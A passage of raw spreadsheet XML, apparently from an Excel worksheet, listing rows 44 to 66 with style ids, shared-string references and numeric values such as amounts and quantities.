        <v>4243</v>
      </c>
      <c r="F44" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G44" s="36">
        <v>1</v>
      </c>
      <c r="H44" s="257" t="s">
        <v>4244</v>
      </c>
      <c r="I44" s="67">
        <v>8659726.36</v>
      </c>
      <c r="J44" s="50">
        <v>688000</v>
      </c>
      <c r="K44" s="259" t="s">
        <v>4245</v>
      </c>
      <c r="L44" s="47"/>
      <c r="M44" s="47"/>
      <c r="N44" s="47"/>
      <c r="O44" s="47"/>
      <c r="P44" s="47"/>
      <c r="Q44" s="47"/>
      <c r="R44" s="47"/>
      <c r="S44" s="47"/>
      <c r="T44" s="47"/>
      <c r="U44" s="47"/>
      <c r="V44" s="47"/>
      <c r="W44" s="47"/>
      <c r="X44" s="47"/>
      <c r="Y44" s="47"/>
      <c r="Z44" s="47"/>
      <c r="AA44" s="47"/>
      <c r="AB44" s="47"/>
      <c r="AC44" s="47"/>
      <c r="AD44" s="47"/>
      <c r="AE44" s="47"/>
      <c r="AF44" s="47"/>
      <c r="AG44" s="47"/>
    </row>
    <row r="45" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A45" s="25"/>
      <c r="B45" s="23">
        <v>121</v>
      </c>
      <c r="C45" s="257" t="s">
        <v>4246</v>
      </c>
      <c r="D45" s="258" t="s">
        <v>4247</v>
      </c>
      <c r="E45" s="258" t="s">
        <v>1142</v>
      </c>
      <c r="F45" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G45" s="36">
        <v>5</v>
      </c>
      <c r="H45" s="257" t="s">
        <v>4244</v>
      </c>
      <c r="I45" s="67">
        <v>3612537.81</v>
      </c>
      <c r="J45" s="50">
        <v>1036800</v>
      </c>
      <c r="K45" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L45" s="47"/>
      <c r="M45" s="47"/>
      <c r="N45" s="47"/>
      <c r="O45" s="47"/>
      <c r="P45" s="47"/>
      <c r="Q45" s="47"/>
      <c r="R45" s="47"/>
      <c r="S45" s="47"/>
      <c r="T45" s="47"/>
      <c r="U45" s="47"/>
      <c r="V45" s="47"/>
      <c r="W45" s="47"/>
      <c r="X45" s="47"/>
      <c r="Y45" s="47"/>
      <c r="Z45" s="47"/>
      <c r="AA45" s="47"/>
      <c r="AB45" s="47"/>
      <c r="AC45" s="47"/>
      <c r="AD45" s="47"/>
      <c r="AE45" s="47"/>
      <c r="AF45" s="47"/>
      <c r="AG45" s="47"/>
    </row>
    <row r="46" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A46" s="25"/>
      <c r="B46" s="23">
        <v>127</v>
      </c>
      <c r="C46" s="257" t="s">
        <v>4248</v>
      </c>
      <c r="D46" s="258" t="s">
        <v>4249</v>
      </c>
      <c r="E46" s="258" t="s">
        <v>4250</v>
      </c>
      <c r="F46" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G46" s="36">
        <v>2</v>
      </c>
      <c r="H46" s="257" t="s">
        <v>1461</v>
      </c>
      <c r="I46" s="67">
        <v>11000</v>
      </c>
      <c r="J46" s="50">
        <v>2024</v>
      </c>
      <c r="K46" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L46" s="47"/>
      <c r="M46" s="47"/>
      <c r="N46" s="47"/>
      <c r="O46" s="47"/>
      <c r="P46" s="47"/>
      <c r="Q46" s="47"/>
      <c r="R46" s="47"/>
      <c r="S46" s="47"/>
      <c r="T46" s="47"/>
      <c r="U46" s="47"/>
      <c r="V46" s="47"/>
      <c r="W46" s="47"/>
      <c r="X46" s="47"/>
      <c r="Y46" s="47"/>
      <c r="Z46" s="47"/>
      <c r="AA46" s="47"/>
      <c r="AB46" s="47"/>
      <c r="AC46" s="47"/>
      <c r="AD46" s="47"/>
      <c r="AE46" s="47"/>
      <c r="AF46" s="47"/>
      <c r="AG46" s="47"/>
    </row>
    <row r="47" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A47" s="25"/>
      <c r="B47" s="23">
        <v>129</v>
      </c>
      <c r="C47" s="257" t="s">
        <v>4252</v>
      </c>
      <c r="D47" s="258" t="s">
        <v>4198</v>
      </c>
      <c r="E47" s="66"/>
      <c r="F47" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G47" s="36">
        <v>1</v>
      </c>
      <c r="H47" s="257" t="s">
        <v>467</v>
      </c>
      <c r="I47" s="67">
        <v>446752.14</v>
      </c>
      <c r="J47" s="50">
        <v>44800</v>
      </c>
      <c r="K47" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L47" s="47"/>
      <c r="M47" s="47"/>
      <c r="N47" s="47"/>
      <c r="O47" s="47"/>
      <c r="P47" s="47"/>
      <c r="Q47" s="47"/>
      <c r="R47" s="47"/>
      <c r="S47" s="47"/>
      <c r="T47" s="47"/>
      <c r="U47" s="47"/>
      <c r="V47" s="47"/>
      <c r="W47" s="47"/>
      <c r="X47" s="47"/>
      <c r="Y47" s="47"/>
      <c r="Z47" s="47"/>
      <c r="AA47" s="47"/>
      <c r="AB47" s="47"/>
      <c r="AC47" s="47"/>
      <c r="AD47" s="47"/>
      <c r="AE47" s="47"/>
      <c r="AF47" s="47"/>
      <c r="AG47" s="47"/>
    </row>
    <row r="48" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A48" s="25"/>
      <c r="B48" s="23">
        <v>130</v>
      </c>
      <c r="C48" s="257" t="s">
        <v>4253</v>
      </c>
      <c r="D48" s="258" t="s">
        <v>4195</v>
      </c>
      <c r="E48" s="66"/>
      <c r="F48" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G48" s="36">
        <v>5</v>
      </c>
      <c r="H48" s="257" t="s">
        <v>467</v>
      </c>
      <c r="I48" s="67">
        <v>430000</v>
      </c>
      <c r="J48" s="50">
        <v>64000</v>
      </c>
      <c r="K48" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L48" s="47"/>
      <c r="M48" s="47"/>
      <c r="N48" s="47"/>
      <c r="O48" s="47"/>
      <c r="P48" s="47"/>
      <c r="Q48" s="47"/>
      <c r="R48" s="47"/>
      <c r="S48" s="47"/>
      <c r="T48" s="47"/>
      <c r="U48" s="47"/>
      <c r="V48" s="47"/>
      <c r="W48" s="47"/>
      <c r="X48" s="47"/>
      <c r="Y48" s="47"/>
      <c r="Z48" s="47"/>
      <c r="AA48" s="47"/>
      <c r="AB48" s="47"/>
      <c r="AC48" s="47"/>
      <c r="AD48" s="47"/>
      <c r="AE48" s="47"/>
      <c r="AF48" s="47"/>
      <c r="AG48" s="47"/>
    </row>
    <row r="49" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A49" s="25"/>
      <c r="B49" s="23">
        <v>131</v>
      </c>
      <c r="C49" s="257" t="s">
        <v>4254</v>
      </c>
      <c r="D49" s="258" t="s">
        <v>4255</v>
      </c>
      <c r="E49" s="258" t="s">
        <v>4256</v>
      </c>
      <c r="F49" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G49" s="36">
        <v>1</v>
      </c>
      <c r="H49" s="257" t="s">
        <v>4257</v>
      </c>
      <c r="I49" s="67">
        <v>7228</v>
      </c>
      <c r="J49" s="50">
        <v>640</v>
      </c>
      <c r="K49" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L49" s="47"/>
      <c r="M49" s="47"/>
      <c r="N49" s="47"/>
      <c r="O49" s="47"/>
      <c r="P49" s="47"/>
      <c r="Q49" s="47"/>
      <c r="R49" s="47"/>
      <c r="S49" s="47"/>
      <c r="T49" s="47"/>
      <c r="U49" s="47"/>
      <c r="V49" s="47"/>
      <c r="W49" s="47"/>
      <c r="X49" s="47"/>
      <c r="Y49" s="47"/>
      <c r="Z49" s="47"/>
      <c r="AA49" s="47"/>
      <c r="AB49" s="47"/>
      <c r="AC49" s="47"/>
      <c r="AD49" s="47"/>
      <c r="AE49" s="47"/>
      <c r="AF49" s="47"/>
      <c r="AG49" s="47"/>
    </row>
    <row r="50" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A50" s="25"/>
      <c r="B50" s="23">
        <v>132</v>
      </c>
      <c r="C50" s="257" t="s">
        <v>4258</v>
      </c>
      <c r="D50" s="258" t="s">
        <v>1324</v>
      </c>
      <c r="E50" s="258" t="s">
        <v>4259</v>
      </c>
      <c r="F50" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G50" s="36">
        <v>1</v>
      </c>
      <c r="H50" s="257" t="s">
        <v>4257</v>
      </c>
      <c r="I50" s="67">
        <v>6896</v>
      </c>
      <c r="J50" s="50">
        <v>560</v>
      </c>
      <c r="K50" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L50" s="25"/>
      <c r="M50" s="25"/>
      <c r="N50" s="47"/>
      <c r="O50" s="47"/>
      <c r="P50" s="47"/>
      <c r="Q50" s="47"/>
      <c r="R50" s="47"/>
      <c r="S50" s="47"/>
      <c r="T50" s="47"/>
      <c r="U50" s="47"/>
      <c r="V50" s="47"/>
      <c r="W50" s="47"/>
      <c r="X50" s="47"/>
      <c r="Y50" s="47"/>
      <c r="Z50" s="47"/>
      <c r="AA50" s="47"/>
      <c r="AB50" s="47"/>
      <c r="AC50" s="47"/>
      <c r="AD50" s="47"/>
      <c r="AE50" s="47"/>
      <c r="AF50" s="47"/>
      <c r="AG50" s="47"/>
    </row>
    <row r="51" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A51" s="25"/>
      <c r="B51" s="23">
        <v>133</v>
      </c>
      <c r="C51" s="257" t="s">
        <v>4260</v>
      </c>
      <c r="D51" s="258" t="s">
        <v>1942</v>
      </c>
      <c r="E51" s="258" t="s">
        <v>4261</v>
      </c>
      <c r="F51" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G51" s="36">
        <v>1</v>
      </c>
      <c r="H51" s="257" t="s">
        <v>672</v>
      </c>
      <c r="I51" s="67">
        <v>12500</v>
      </c>
      <c r="J51" s="50">
        <v>1000</v>
      </c>
      <c r="K51" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L51" s="25"/>
      <c r="M51" s="25"/>
      <c r="N51" s="47"/>
      <c r="O51" s="47"/>
      <c r="P51" s="47"/>
      <c r="Q51" s="47"/>
      <c r="R51" s="47"/>
      <c r="S51" s="47"/>
      <c r="T51" s="47"/>
      <c r="U51" s="47"/>
      <c r="V51" s="47"/>
      <c r="W51" s="47"/>
      <c r="X51" s="47"/>
      <c r="Y51" s="47"/>
      <c r="Z51" s="47"/>
      <c r="AA51" s="47"/>
      <c r="AB51" s="47"/>
      <c r="AC51" s="47"/>
      <c r="AD51" s="47"/>
      <c r="AE51" s="47"/>
      <c r="AF51" s="47"/>
      <c r="AG51" s="47"/>
    </row>
    <row r="52" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A52" s="25"/>
      <c r="B52" s="23">
        <v>135</v>
      </c>
      <c r="C52" s="257" t="s">
        <v>4262</v>
      </c>
      <c r="D52" s="258" t="s">
        <v>3233</v>
      </c>
      <c r="E52" s="258" t="s">
        <v>4263</v>
      </c>
      <c r="F52" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G52" s="36">
        <v>2</v>
      </c>
      <c r="H52" s="257" t="s">
        <v>534</v>
      </c>
      <c r="I52" s="67">
        <v>38500</v>
      </c>
      <c r="J52" s="50">
        <v>3080</v>
      </c>
      <c r="K52" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L52" s="25"/>
      <c r="M52" s="25"/>
      <c r="N52" s="47"/>
      <c r="O52" s="47"/>
      <c r="P52" s="47"/>
      <c r="Q52" s="47"/>
      <c r="R52" s="47"/>
      <c r="S52" s="47"/>
      <c r="T52" s="47"/>
      <c r="U52" s="47"/>
      <c r="V52" s="47"/>
      <c r="W52" s="47"/>
      <c r="X52" s="47"/>
      <c r="Y52" s="47"/>
      <c r="Z52" s="47"/>
      <c r="AA52" s="47"/>
      <c r="AB52" s="47"/>
      <c r="AC52" s="47"/>
      <c r="AD52" s="47"/>
      <c r="AE52" s="47"/>
      <c r="AF52" s="47"/>
      <c r="AG52" s="47"/>
    </row>
    <row r="53" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A53" s="25"/>
      <c r="B53" s="23">
        <v>136</v>
      </c>
      <c r="C53" s="257" t="s">
        <v>4264</v>
      </c>
      <c r="D53" s="258" t="s">
        <v>1273</v>
      </c>
      <c r="E53" s="258" t="s">
        <v>4265</v>
      </c>
      <c r="F53" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G53" s="36">
        <v>1</v>
      </c>
      <c r="H53" s="257" t="s">
        <v>534</v>
      </c>
      <c r="I53" s="67">
        <v>29500</v>
      </c>
      <c r="J53" s="50">
        <v>2000</v>
      </c>
      <c r="K53" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L53" s="47"/>
      <c r="M53" s="47"/>
      <c r="N53" s="47"/>
      <c r="O53" s="47"/>
      <c r="P53" s="47"/>
      <c r="Q53" s="47"/>
      <c r="R53" s="47"/>
      <c r="S53" s="47"/>
      <c r="T53" s="47"/>
      <c r="U53" s="47"/>
      <c r="V53" s="47"/>
      <c r="W53" s="47"/>
      <c r="X53" s="47"/>
      <c r="Y53" s="47"/>
      <c r="Z53" s="47"/>
      <c r="AA53" s="47"/>
      <c r="AB53" s="47"/>
      <c r="AC53" s="47"/>
      <c r="AD53" s="47"/>
      <c r="AE53" s="47"/>
      <c r="AF53" s="47"/>
      <c r="AG53" s="47"/>
    </row>
    <row r="54" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A54" s="25"/>
      <c r="B54" s="23">
        <v>137</v>
      </c>
      <c r="C54" s="257" t="s">
        <v>4266</v>
      </c>
      <c r="D54" s="258" t="s">
        <v>331</v>
      </c>
      <c r="E54" s="258" t="s">
        <v>4267</v>
      </c>
      <c r="F54" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G54" s="36">
        <v>1</v>
      </c>
      <c r="H54" s="257" t="s">
        <v>522</v>
      </c>
      <c r="I54" s="67">
        <v>11000</v>
      </c>
      <c r="J54" s="50">
        <v>3872</v>
      </c>
      <c r="K54" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L54" s="69"/>
      <c r="M54" s="69"/>
      <c r="N54" s="47"/>
      <c r="O54" s="47"/>
      <c r="P54" s="47"/>
      <c r="Q54" s="47"/>
      <c r="R54" s="47"/>
      <c r="S54" s="47"/>
      <c r="T54" s="47"/>
      <c r="U54" s="47"/>
      <c r="V54" s="47"/>
      <c r="W54" s="47"/>
      <c r="X54" s="47"/>
      <c r="Y54" s="47"/>
      <c r="Z54" s="47"/>
      <c r="AA54" s="47"/>
      <c r="AB54" s="47"/>
      <c r="AC54" s="47"/>
      <c r="AD54" s="47"/>
      <c r="AE54" s="47"/>
      <c r="AF54" s="47"/>
      <c r="AG54" s="47"/>
    </row>
    <row r="55" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A55" s="25"/>
      <c r="B55" s="23">
        <v>138</v>
      </c>
      <c r="C55" s="257" t="s">
        <v>4268</v>
      </c>
      <c r="D55" s="258" t="s">
        <v>3228</v>
      </c>
      <c r="E55" s="258" t="s">
        <v>4269</v>
      </c>
      <c r="F55" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G55" s="36">
        <v>1</v>
      </c>
      <c r="H55" s="257" t="s">
        <v>343</v>
      </c>
      <c r="I55" s="67">
        <v>1264536.29</v>
      </c>
      <c r="J55" s="50">
        <v>105600</v>
      </c>
      <c r="K55" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L55" s="47"/>
      <c r="M55" s="47"/>
      <c r="N55" s="47"/>
      <c r="O55" s="47"/>
      <c r="P55" s="47"/>
      <c r="Q55" s="47"/>
      <c r="R55" s="47"/>
      <c r="S55" s="47"/>
      <c r="T55" s="47"/>
      <c r="U55" s="47"/>
      <c r="V55" s="47"/>
      <c r="W55" s="47"/>
      <c r="X55" s="47"/>
      <c r="Y55" s="47"/>
      <c r="Z55" s="47"/>
      <c r="AA55" s="47"/>
      <c r="AB55" s="47"/>
      <c r="AC55" s="47"/>
      <c r="AD55" s="47"/>
      <c r="AE55" s="47"/>
      <c r="AF55" s="47"/>
      <c r="AG55" s="47"/>
    </row>
    <row r="56" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A56" s="25"/>
      <c r="B56" s="23">
        <v>140</v>
      </c>
      <c r="C56" s="257" t="s">
        <v>4270</v>
      </c>
      <c r="D56" s="258" t="s">
        <v>1324</v>
      </c>
      <c r="E56" s="66"/>
      <c r="F56" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G56" s="36">
        <v>2</v>
      </c>
      <c r="H56" s="257" t="s">
        <v>1670</v>
      </c>
      <c r="I56" s="67">
        <v>18996</v>
      </c>
      <c r="J56" s="50">
        <v>6336</v>
      </c>
      <c r="K56" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L56" s="47"/>
      <c r="M56" s="47"/>
      <c r="N56" s="47"/>
      <c r="O56" s="47"/>
      <c r="P56" s="47"/>
      <c r="Q56" s="47"/>
      <c r="R56" s="47"/>
      <c r="S56" s="47"/>
      <c r="T56" s="47"/>
      <c r="U56" s="47"/>
      <c r="V56" s="47"/>
      <c r="W56" s="47"/>
      <c r="X56" s="47"/>
      <c r="Y56" s="47"/>
      <c r="Z56" s="47"/>
      <c r="AA56" s="47"/>
      <c r="AB56" s="47"/>
      <c r="AC56" s="47"/>
      <c r="AD56" s="47"/>
      <c r="AE56" s="47"/>
      <c r="AF56" s="47"/>
      <c r="AG56" s="47"/>
    </row>
    <row r="57" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A57" s="25"/>
      <c r="B57" s="23">
        <v>141</v>
      </c>
      <c r="C57" s="257" t="s">
        <v>4271</v>
      </c>
      <c r="D57" s="258" t="s">
        <v>3233</v>
      </c>
      <c r="E57" s="258" t="s">
        <v>4272</v>
      </c>
      <c r="F57" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G57" s="36">
        <v>1</v>
      </c>
      <c r="H57" s="257" t="s">
        <v>1171</v>
      </c>
      <c r="I57" s="67">
        <v>25950</v>
      </c>
      <c r="J57" s="50">
        <v>2000</v>
      </c>
      <c r="K57" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L57" s="70"/>
      <c r="M57" s="70"/>
      <c r="N57" s="47"/>
      <c r="O57" s="47"/>
      <c r="P57" s="47"/>
      <c r="Q57" s="47"/>
      <c r="R57" s="47"/>
      <c r="S57" s="47"/>
      <c r="T57" s="47"/>
      <c r="U57" s="47"/>
      <c r="V57" s="47"/>
      <c r="W57" s="47"/>
      <c r="X57" s="47"/>
      <c r="Y57" s="47"/>
      <c r="Z57" s="47"/>
      <c r="AA57" s="47"/>
      <c r="AB57" s="47"/>
      <c r="AC57" s="47"/>
      <c r="AD57" s="47"/>
      <c r="AE57" s="47"/>
      <c r="AF57" s="47"/>
      <c r="AG57" s="47"/>
    </row>
    <row r="58" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A58" s="25"/>
      <c r="B58" s="23">
        <v>142</v>
      </c>
      <c r="C58" s="257" t="s">
        <v>4273</v>
      </c>
      <c r="D58" s="258" t="s">
        <v>334</v>
      </c>
      <c r="E58" s="66" t="s">
        <v>1288</v>
      </c>
      <c r="F58" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G58" s="36">
        <v>3</v>
      </c>
      <c r="H58" s="257" t="s">
        <v>1405</v>
      </c>
      <c r="I58" s="67">
        <v>95100</v>
      </c>
      <c r="J58" s="50">
        <v>7600</v>
      </c>
      <c r="K58" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L58" s="70"/>
      <c r="M58" s="70"/>
      <c r="N58" s="47"/>
      <c r="O58" s="47"/>
      <c r="P58" s="47"/>
      <c r="Q58" s="47"/>
      <c r="R58" s="47"/>
      <c r="S58" s="47"/>
      <c r="T58" s="47"/>
      <c r="U58" s="47"/>
      <c r="V58" s="47"/>
      <c r="W58" s="47"/>
      <c r="X58" s="47"/>
      <c r="Y58" s="47"/>
      <c r="Z58" s="47"/>
      <c r="AA58" s="47"/>
      <c r="AB58" s="47"/>
      <c r="AC58" s="47"/>
      <c r="AD58" s="47"/>
      <c r="AE58" s="47"/>
      <c r="AF58" s="47"/>
      <c r="AG58" s="47"/>
    </row>
    <row r="59" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A59" s="25"/>
      <c r="B59" s="23">
        <v>143</v>
      </c>
      <c r="C59" s="257" t="s">
        <v>4274</v>
      </c>
      <c r="D59" s="258" t="s">
        <v>3233</v>
      </c>
      <c r="E59" s="66"/>
      <c r="F59" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G59" s="36">
        <v>3</v>
      </c>
      <c r="H59" s="257" t="s">
        <v>1405</v>
      </c>
      <c r="I59" s="67">
        <v>50685</v>
      </c>
      <c r="J59" s="50">
        <v>6000</v>
      </c>
      <c r="K59" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L59" s="47"/>
      <c r="M59" s="47"/>
      <c r="N59" s="47"/>
      <c r="O59" s="47"/>
      <c r="P59" s="47"/>
      <c r="Q59" s="47"/>
      <c r="R59" s="47"/>
      <c r="S59" s="47"/>
      <c r="T59" s="47"/>
      <c r="U59" s="47"/>
      <c r="V59" s="47"/>
      <c r="W59" s="47"/>
      <c r="X59" s="47"/>
      <c r="Y59" s="47"/>
      <c r="Z59" s="47"/>
      <c r="AA59" s="47"/>
      <c r="AB59" s="47"/>
      <c r="AC59" s="47"/>
      <c r="AD59" s="47"/>
      <c r="AE59" s="47"/>
      <c r="AF59" s="47"/>
      <c r="AG59" s="47"/>
    </row>
    <row r="60" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A60" s="25"/>
      <c r="B60" s="23">
        <v>144</v>
      </c>
      <c r="C60" s="257" t="s">
        <v>4275</v>
      </c>
      <c r="D60" s="258" t="s">
        <v>3233</v>
      </c>
      <c r="E60" s="66"/>
      <c r="F60" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G60" s="36">
        <v>3</v>
      </c>
      <c r="H60" s="257" t="s">
        <v>1405</v>
      </c>
      <c r="I60" s="67">
        <v>61860</v>
      </c>
      <c r="J60" s="50">
        <v>6000</v>
      </c>
      <c r="K60" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L60" s="47"/>
      <c r="M60" s="47"/>
      <c r="N60" s="47"/>
      <c r="O60" s="47"/>
      <c r="P60" s="47"/>
      <c r="Q60" s="47"/>
      <c r="R60" s="47"/>
      <c r="S60" s="47"/>
      <c r="T60" s="47"/>
      <c r="U60" s="47"/>
      <c r="V60" s="47"/>
      <c r="W60" s="47"/>
      <c r="X60" s="47"/>
      <c r="Y60" s="47"/>
      <c r="Z60" s="47"/>
      <c r="AA60" s="47"/>
      <c r="AB60" s="47"/>
      <c r="AC60" s="47"/>
      <c r="AD60" s="47"/>
      <c r="AE60" s="47"/>
      <c r="AF60" s="47"/>
      <c r="AG60" s="47"/>
    </row>
    <row r="61" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A61" s="25"/>
      <c r="B61" s="23">
        <v>145</v>
      </c>
      <c r="C61" s="257" t="s">
        <v>4276</v>
      </c>
      <c r="D61" s="258" t="s">
        <v>4277</v>
      </c>
      <c r="E61" s="66"/>
      <c r="F61" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G61" s="36">
        <v>1</v>
      </c>
      <c r="H61" s="257" t="s">
        <v>1405</v>
      </c>
      <c r="I61" s="67">
        <v>14830</v>
      </c>
      <c r="J61" s="50">
        <v>1120</v>
      </c>
      <c r="K61" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L61" s="25"/>
      <c r="M61" s="25"/>
      <c r="N61" s="47"/>
      <c r="O61" s="47"/>
      <c r="P61" s="47"/>
      <c r="Q61" s="47"/>
      <c r="R61" s="47"/>
      <c r="S61" s="47"/>
      <c r="T61" s="47"/>
      <c r="U61" s="47"/>
      <c r="V61" s="47"/>
      <c r="W61" s="47"/>
      <c r="X61" s="47"/>
      <c r="Y61" s="47"/>
      <c r="Z61" s="47"/>
      <c r="AA61" s="47"/>
      <c r="AB61" s="47"/>
      <c r="AC61" s="47"/>
      <c r="AD61" s="47"/>
      <c r="AE61" s="47"/>
      <c r="AF61" s="47"/>
      <c r="AG61" s="47"/>
    </row>
    <row r="62" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A62" s="25"/>
      <c r="B62" s="23">
        <v>146</v>
      </c>
      <c r="C62" s="257" t="s">
        <v>4278</v>
      </c>
      <c r="D62" s="258" t="s">
        <v>3429</v>
      </c>
      <c r="E62" s="66"/>
      <c r="F62" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G62" s="36">
        <v>1</v>
      </c>
      <c r="H62" s="257" t="s">
        <v>1405</v>
      </c>
      <c r="I62" s="67">
        <v>10190</v>
      </c>
      <c r="J62" s="50">
        <v>640</v>
      </c>
      <c r="K62" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L62" s="25"/>
      <c r="M62" s="25"/>
      <c r="N62" s="47"/>
      <c r="O62" s="47"/>
      <c r="P62" s="47"/>
      <c r="Q62" s="47"/>
      <c r="R62" s="47"/>
      <c r="S62" s="47"/>
      <c r="T62" s="47"/>
      <c r="U62" s="47"/>
      <c r="V62" s="47"/>
      <c r="W62" s="47"/>
      <c r="X62" s="47"/>
      <c r="Y62" s="47"/>
      <c r="Z62" s="47"/>
      <c r="AA62" s="47"/>
      <c r="AB62" s="47"/>
      <c r="AC62" s="47"/>
      <c r="AD62" s="47"/>
      <c r="AE62" s="47"/>
      <c r="AF62" s="47"/>
      <c r="AG62" s="47"/>
    </row>
    <row r="63" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A63" s="25"/>
      <c r="B63" s="23">
        <v>147</v>
      </c>
      <c r="C63" s="257" t="s">
        <v>4279</v>
      </c>
      <c r="D63" s="258" t="s">
        <v>4280</v>
      </c>
      <c r="E63" s="66"/>
      <c r="F63" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G63" s="36">
        <v>1</v>
      </c>
      <c r="H63" s="257" t="s">
        <v>587</v>
      </c>
      <c r="I63" s="67">
        <v>36000</v>
      </c>
      <c r="J63" s="50">
        <v>8352</v>
      </c>
      <c r="K63" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L63" s="25"/>
      <c r="M63" s="25"/>
      <c r="N63" s="47"/>
      <c r="O63" s="47"/>
      <c r="P63" s="47"/>
      <c r="Q63" s="47"/>
      <c r="R63" s="47"/>
      <c r="S63" s="47"/>
      <c r="T63" s="47"/>
      <c r="U63" s="47"/>
      <c r="V63" s="47"/>
      <c r="W63" s="47"/>
      <c r="X63" s="47"/>
      <c r="Y63" s="47"/>
      <c r="Z63" s="47"/>
      <c r="AA63" s="47"/>
      <c r="AB63" s="47"/>
      <c r="AC63" s="47"/>
      <c r="AD63" s="47"/>
      <c r="AE63" s="47"/>
      <c r="AF63" s="47"/>
      <c r="AG63" s="47"/>
    </row>
    <row r="64" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A64" s="25"/>
      <c r="B64" s="23">
        <v>148</v>
      </c>
      <c r="C64" s="257" t="s">
        <v>4281</v>
      </c>
      <c r="D64" s="258" t="s">
        <v>315</v>
      </c>
      <c r="E64" s="66"/>
      <c r="F64" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G64" s="36">
        <v>2</v>
      </c>
      <c r="H64" s="257" t="s">
        <v>4058</v>
      </c>
      <c r="I64" s="67">
        <v>29800</v>
      </c>
      <c r="J64" s="50">
        <v>3712</v>
      </c>
      <c r="K64" s="259" t="s">
        <v>1927</v>
      </c>
      <c r="L64" s="25"/>
      <c r="M64" s="25"/>
      <c r="N64" s="47"/>
      <c r="O64" s="47"/>
      <c r="P64" s="47"/>
      <c r="Q64" s="47"/>
      <c r="R64" s="47"/>
      <c r="S64" s="47"/>
      <c r="T64" s="47"/>
      <c r="U64" s="47"/>
      <c r="V64" s="47"/>
      <c r="W64" s="47"/>
      <c r="X64" s="47"/>
      <c r="Y64" s="47"/>
      <c r="Z64" s="47"/>
      <c r="AA64" s="47"/>
      <c r="AB64" s="47"/>
      <c r="AC64" s="47"/>
      <c r="AD64" s="47"/>
      <c r="AE64" s="47"/>
      <c r="AF64" s="47"/>
      <c r="AG64" s="47"/>
    </row>
    <row r="65" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A65" s="25"/>
      <c r="B65" s="23">
        <v>149</v>
      </c>
      <c r="C65" s="257" t="s">
        <v>4282</v>
      </c>
      <c r="D65" s="258" t="s">
        <v>4283</v>
      </c>
      <c r="E65" s="66"/>
      <c r="F65" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G65" s="36">
        <v>1</v>
      </c>
      <c r="H65" s="257" t="s">
        <v>596</v>
      </c>
      <c r="I65" s="67">
        <v>394188.73</v>
      </c>
      <c r="J65" s="50">
        <v>15200</v>
      </c>
      <c r="K65" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L65" s="25"/>
      <c r="M65" s="25"/>
      <c r="N65" s="47"/>
      <c r="O65" s="47"/>
      <c r="P65" s="47"/>
      <c r="Q65" s="47"/>
      <c r="R65" s="47"/>
      <c r="S65" s="47"/>
      <c r="T65" s="47"/>
      <c r="U65" s="47"/>
      <c r="V65" s="47"/>
      <c r="W65" s="47"/>
      <c r="X65" s="47"/>
      <c r="Y65" s="47"/>
      <c r="Z65" s="47"/>
      <c r="AA65" s="47"/>
      <c r="AB65" s="47"/>
      <c r="AC65" s="47"/>
      <c r="AD65" s="47"/>
      <c r="AE65" s="47"/>
      <c r="AF65" s="47"/>
      <c r="AG65" s="47"/>
    </row>
    <row r="66" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A66" s="25"/>
